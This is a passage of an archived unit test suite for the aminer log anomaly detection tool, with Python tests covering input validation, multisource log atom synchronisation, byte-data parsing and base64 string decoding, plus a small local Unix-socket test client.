self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep="default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=None) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=True) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=123) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=123.3) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=[b"default"]) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep={"id": "Default"}) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=set()) self.assertRaises(ValueError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=b"") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format="default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=b"Default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=None) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=123) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=123.3) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=[b"default"]) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format={"id": "Default"}) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=set()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format="default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=b"Default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=None) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=123) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=123.3) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=[b"default"]) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format={"id": "Default"}) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=set()) self.assertRaises(ValueError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=True, xml_format=True) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time="default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=b"Default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=None) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=123) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=123.3) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=[b"default"]) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time={"id": "Default"}) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], use_real_time=set()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning="default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=b"Default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=None) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=123) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=123.3) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=[b"default"]) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning={"id": "Default"}) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], continuous_timestamp_missing_warning=set()) SimpleByteStreamLineAtomizerFactory(fdme, [], [], ["path"]) SimpleByteStreamLineAtomizerFactory(fdme, None, [], []) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/SimpleMultisourceAtomSyncTest.py000066400000000000000000000174161500476301700315050ustar00rootroot00000000000000import unittest from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from time import time, sleep from unit.TestBase import TestBase, DummyMatchContext from datetime import datetime class SimpleMultisourceAtomSyncTest(TestBase): """Unittests for the SimpleMultisourceAtomSync.""" def test1receive_atom(self): """Test if the SimpleMultisourceAtomSync works in different scenarios and orders the data correctly.""" __expected_string = '%s New path(s) detected\n%s: "None" (%d lines)\n %s\n\n' __expected_string_no_date = 'New path(s) detected\n%s: "None" (%d lines)\n %s\n\n' calculation = b'256 * 2 = 512' datetime_format_string = '%Y-%m-%d %H:%M:%S' match_path = "['match/a1']" # already sorted log atoms sync_wait_time = 3 abdme = AnyByteDataModelElement("a1") nmpd1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False, output_logline=False) nmpd2 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False, output_logline=False) smas = SimpleMultisourceAtomSync([nmpd1, nmpd2], sync_wait_time) t = time() match_element = abdme.get_match_element("match", DummyMatchContext(calculation)) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, nmpd1) log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t + 1, nmpd1) self.assertFalse(smas.receive_atom(log_atom1)) sleep(sync_wait_time + 1) # not of the same source, thus must not be accepted. self.assertFalse(smas.receive_atom(log_atom2)) self.assertTrue(smas.receive_atom(log_atom1)) # logAtom1 is handled now, so logAtom2 is accepted. self.reset_output_stream() self.assertTrue(smas.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), __expected_string % ( datetime.fromtimestamp(t + 1).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path) + __expected_string % ( datetime.fromtimestamp(t + 1).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path)) # In this test case a LogAtom with no timestamp is received by the class. self.reset_output_stream() smas = SimpleMultisourceAtomSync([nmpd1], sync_wait_time) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), None, nmpd1) self.assertTrue(smas.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), __expected_string_no_date % (nmpd1.__class__.__name__, 1, match_path)) # In this test case multiple, UNSORTED LogAtoms of different sources are received by the class. smas = SimpleMultisourceAtomSync([nmpd1, nmpd2], sync_wait_time) t = time() log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, nmpd1) log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t - 1, nmpd1) self.assertFalse(smas.receive_atom(log_atom1)) sleep(sync_wait_time) # unsorted, should be accepted self.reset_output_stream() self.assertTrue(smas.receive_atom(log_atom2)) self.assertTrue(smas.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), __expected_string % ( datetime.fromtimestamp(t - 1).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path) + __expected_string % ( datetime.fromtimestamp(t - 1).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path) + __expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path) + __expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), nmpd1.__class__.__name__, 1, match_path)) # In this test case a source becomes idle and expires. smas = SimpleMultisourceAtomSync([nmpd1], sync_wait_time) t = time() log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t, nmpd1) log_atom2 = LogAtom(match_element.match_object, ParserMatch(match_element), t, nmpd2) self.assertFalse(smas.receive_atom(log_atom1)) self.assertFalse(smas.receive_atom(log_atom2)) sleep(sync_wait_time + 1) self.assertTrue(smas.receive_atom(log_atom1)) # log_atom1 is handled now, so new_match_path_detector1 should be deleted after waiting the sync_wait_time. self.assertFalse(smas.receive_atom(log_atom2)) sleep(sync_wait_time + 1) self.assertFalse(smas.receive_atom(log_atom2)) self.assertEqual(smas.sources_dict, {nmpd1: [log_atom1.get_timestamp(), None], nmpd2: [log_atom2.get_timestamp(), log_atom2]}) self.assertTrue(smas.receive_atom(log_atom1)) self.assertTrue(smas.receive_atom(log_atom1)) sleep(sync_wait_time + 1) self.assertTrue(smas.receive_atom(log_atom1)) self.assertEqual(smas.sources_dict, {nmpd1: [log_atom1.get_timestamp(), None], nmpd2: [log_atom2.get_timestamp(), log_atom2]}) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t + 1, nmpd1) self.assertFalse(smas.receive_atom(log_atom1)) self.assertEqual(smas.sources_dict, {nmpd1: [log_atom1.get_timestamp() - 1, log_atom1], nmpd2: [log_atom2.get_timestamp(), log_atom2]}) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t - 1, nmpd1) self.assertTrue(smas.receive_atom(log_atom1)) def test2validate_parameters(self): """Test all initialization parameters for the atomizer. Input parameters must be validated in the class.""" nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False, output_logline=False) self.assertRaises(TypeError, SimpleMultisourceAtomSync, "default", 3) self.assertRaises(TypeError, SimpleMultisourceAtomSync, b"Default", 3) self.assertRaises(TypeError, SimpleMultisourceAtomSync, None, 3) self.assertRaises(TypeError, SimpleMultisourceAtomSync, True, 3) self.assertRaises(TypeError, SimpleMultisourceAtomSync, 123, 3) self.assertRaises(TypeError, SimpleMultisourceAtomSync, 123.3, 3) self.assertRaises(TypeError, SimpleMultisourceAtomSync, ["default"], 3) self.assertRaises(TypeError, SimpleMultisourceAtomSync, {"id": "Default"}, 3) self.assertRaises(TypeError, SimpleMultisourceAtomSync, [], 3) self.assertRaises(TypeError, SimpleMultisourceAtomSync, (), 3) self.assertRaises(TypeError, SimpleMultisourceAtomSync, set(), 3) self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], "default") self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], b"Default",) self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], None) self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], True) self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], ["default"]) self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], {"id": "Default"}) self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], []) self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], ()) self.assertRaises(TypeError, SimpleMultisourceAtomSync, [nmpd], set()) SimpleMultisourceAtomSync([nmpd], 123) SimpleMultisourceAtomSync([nmpd], 123.3) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/__init__.py000066400000000000000000000000001500476301700252160ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/client.py000066400000000000000000000003221500476301700247440ustar00rootroot00000000000000from time import sleep import socket sock_name = '/tmp/test5unixSocket.sock' sleep(0.5) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client.connect(sock_name) client.send(b'data') client.close() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/000077500000000000000000000000001500476301700234235ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/AnyByteDataModelElementTest.py000066400000000000000000000101661500476301700313010ustar00rootroot00000000000000import unittest from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class AnyByteDataModelElementTest(TestBase): """Unittests for the AnyByteDataModelElement.""" id_ = "any" path = "path" def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"abcdefghijklmnopqrstuvwxyz.!?" match_context = DummyMatchContext(data) any_dme = AnyByteDataModelElement(self.id_) match_element = any_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) any_dme = AnyByteDataModelElement(self.id_) match_element = any_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, AnyByteDataModelElement, "") # empty element_id self.assertRaises(TypeError, AnyByteDataModelElement, None) # None element_id self.assertRaises(TypeError, AnyByteDataModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, set()) # empty set element_id is not allowed def test4get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = AnyByteDataModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/Base64StringModelElementTest.py000066400000000000000000000476561500476301700313650ustar00rootroot00000000000000import unittest from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class Base64StringModelElementTest(TestBase): """Unittests for the Base64StringModelElement.""" id_ = "base64" path = "path" def test1get_match_element_valid_match_string_with_padding(self): """Parse matching substring with padding from MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some string to be encoded." base64_string = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkLg==" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None) def test2get_match_element_valid_match_string_with_one_byte_padding(self): """Parse matching substring with padding from MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some encoded strin" base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4=" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None) def test3get_match_element_valid_match_string_without_padding(self): """Parse matching substring without padding from MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some string to be encoded without the padding character =." base64_string = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkIHdpdGhvdXQgdGhlIHBhZGRpbmcgY2hhcmFjdGVyID0u" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None) def test4get_match_element_valid_match_string_without_exact_length(self): """Parse matching substring without exact length (divisible by 4) and check if the MatchContext was updated with all base64 data.""" string = b"This is some encoded strin" base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results( base64_string, match_element, match_context, self.id_, self.path, base64_string[:-(len(base64_string) % 4)], string[:-2], None) def test5get_match_element_valid_match_string_with_partial_length(self): """Parse matching substring out of the MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some encoded strin" base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4=" data = base64_string + b"\nContent: Public Key" match_context = DummyMatchContext(data) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, base64_string, string, None) def test6get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" base64_dme = Base64StringModelElement(self.id_) data = b"!Hello World" match_context = DummyMatchContext(data) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"\x90\x90Hello World" match_context = DummyMatchContext(data) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test7get_match_element_unicode_exception(self): """Parse a Base64 string which can not be decoded as UTF-8, so it has to be returned base64 encoded.""" # ² encoded with ISO-8859-1 base64_string = b"sg==" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, base64_string, None) def test8element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, Base64StringModelElement, "") # empty element_id self.assertRaises(TypeError, Base64StringModelElement, None) # None element_id self.assertRaises(TypeError, Base64StringModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, set()) # empty set element_id is not allowed def test9get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = Base64StringModelElement(self.id_) data = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkLg==" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test10performance(self): """Test the performance of the implementation. Comment this test out in normal cases.""" import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.Base64StringModelElement import Base64StringModelElement times = 100000 """ string100_setup = """ # b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand." base64_string = b"QVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhb" \ b"iBvbmx5IHVuZGVyc3RhbmQu" """ string4096_setup = """ # b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII code " \ # b"is the numerical representation of a character such as "a" or "@" or an action of some sort. ASCII was developed a long time " \ # b"ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII character table and " \ # b"this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and " \ # b"so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they " \ # b"want "plain" text with no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. " \ # b"This is usually so they can easily import the file into their own applications without issues. Notepad.exe creates ASCII " \ # b"text, or in MS Word you can save a file as "text only"ASCII stands for American Standard Code for Information Interchange. " \ # b"Computers can only understand numbers, so an ASCII code is the numerical representation of a character such as "a" or "@" " \ # b"or an action of some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their " \ # b"original purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-printing characters. " \ # b"ASCII was actually designed for use with teletypes and so the descriptions are somewhat obscure. If someone says they want " \ # b"your CV however in ASCII format, all this means is they want "plain" text with no formatting such as tabs, bold or " \ # b"underscoring - the raw format that any computer can understand. This is usually so they can easily import the file into " \ # b"their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you can save a file as "text only"" \ # b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII " \ # b"code is the numerical representation of a character such as "a" or "@" or an action of some sort. ASCII was developed a " \ # b"long time ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII " \ # b"character table and this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for " \ # b"use with teletypes and so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, " \ # b"all this means is they want "plain" text with no formatting such as tabs, bold or underscoring - the raw format that any " \ # b"computer can understand. This is usually so they can easily import the file into their own applications without issues. " \ # b"Notepad.exe creates ASCII text, or in MS Word you can save a file as "text only"ASCII stands for American Standard Code for " \ # b"Information Interchange. Computers can only understand numbers, so an ASCII code is the numerical representation of a " \ # b"character such as "a" or "@" or an action of some sort. ASCII was developed a long time ago and now the non-printing " \ # b"characters are rarely used for their original purpose. Below is the ASCII character table and this includes descriptions " \ # b"of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and so the descriptions are " \ # b"somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they want "plain" text with " \ # b"no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. This is usually so they " \ # b"can easily import the file into their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you " \ # b"can save a file as "text only"ASCII stands for American Standard Code for Information Interchange. Computers can only " \ # b"understand numbers, so an ASCII code is the numerical representation of a character such as "a" or "@" or an action of " \ # b"some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their original " \ # b"purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-prin" base64_string = b"QVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHV" \ b"uZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYX" \ b"MgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub" \ b"24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFy" \ b"YWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUk" \ b"gd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cm" \ b"UuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50I" \ b"CdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQg" \ b"YW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWl" \ b"yIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIH" \ b"NhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoY" \ b"W5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0" \ b"aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9" \ b"uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2" \ b"UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tc" \ b"HJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlw" \ 